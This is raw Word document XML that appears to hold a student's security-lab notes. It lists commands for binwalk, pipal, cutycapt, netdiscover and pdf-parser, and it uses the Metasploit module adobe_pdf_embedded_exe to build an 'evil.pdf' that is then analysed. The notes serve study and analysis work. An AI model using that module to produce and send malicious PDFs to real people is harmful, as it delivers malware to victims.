        <w:t xml:space="preserve"> -e WhatsAppSetup.exe (extract)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370C5B4B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binwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -E WhatsAppSetup.exe (entropy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70171513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binwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Me WhatsAppSetup.exe (recursive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40906905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binwalk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Mre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> WhatsAppSetup.exe (delete 0-size files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F19CD0A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binwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -f file.log WhatsAppSetup.exe (log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDBEBE0" w14:textId="0EE170D5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binwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -W first.exe second.exe (difference)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B25D2A" w14:textId="3CB7947A" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFA0B4F" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="491B9681" w14:textId="4269A596" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A023359" w14:textId="7178BE96" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="403477DA" w14:textId="6F8E410A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7a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6208AE" w14:textId="2EF3D25B" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767101AF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pipal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A907B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pipal -t 10 passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7565ACE6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pipal passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A6FB2C" w14:textId="4CC0481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pipal --list-checkers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A85F5" w14:textId="4E11B52F" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1860BA39" w14:textId="6C54ABF8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7b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FEBE7F" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDEDD1C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cutycapt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23D5663F" w14:textId="56908D98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cutycapt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=https://www.google.com --out=file.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0294ED65" w14:textId="2663E1C2" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D88D71" w14:textId="6EB72135" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F6959E7" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1080E5D0" w14:textId="3BFD1A27" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E12FD8" w14:textId="6073FFAD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8a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D246EA1" w14:textId="59B50E13" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CC5BE1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netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FEDA4D9" w14:textId="3504869A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netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r 192.168.0.125 (Bridge adapter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ACA501" w14:textId="3F42CFC9" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012A233F" w14:textId="5DD4D72E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8b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD9F812" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="370E78D8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pdf-parser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413EDA0C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msfconsole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tab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233FE790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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&gt;&gt; use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileformat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adobe_pdf_embedded_exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65A333AF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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&gt;&gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4102BF81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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&gt;&gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2179862A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tab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1CCBFA" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E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pdfid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/.msf4/local/evil.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CA240A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pdf-parser /root/.msf4/local/evil.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D574E5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pdf-parser -o 10 /root/.msf4/local/evil.pdf (10th object)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F21FD3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pdf-parser -a /root/.msf4/local/evil.pdf (pdf stats)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BBC90E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>pdf-parser -H /root/.msf4/local/evil.pdf (get hashes if any)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D020A" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">pdf-parser --search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--raw /root/.msf4/local/evil.pdf (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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E41F50" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18920633" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E9C4D9" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD9AA0D" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2922AD9E" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1180DAA3" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F45EB18" w14:textId="77777777" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63EF3754" w14:textId="77777777" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0650B0C1" w14:textId="77777777" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE618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07000CDE" w14:textId="77777777" w:rsidR="00CE6180" w:rsidRDefault="00CE6180"/>
    <w:sectPr w:rsidR="00CE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69"/>
    <w:rsid w:val="003B27E8"/>
    <w:rsid w:val="00BF327D"/>
    <w:rsid w:val="00CE6180"/>
    <w:rsid w:val="00E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6699"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{31527434-0E34-4CFA-816D-71B39467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1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shenoydhee</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>shenoydhee</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-15T14:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-15T14:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>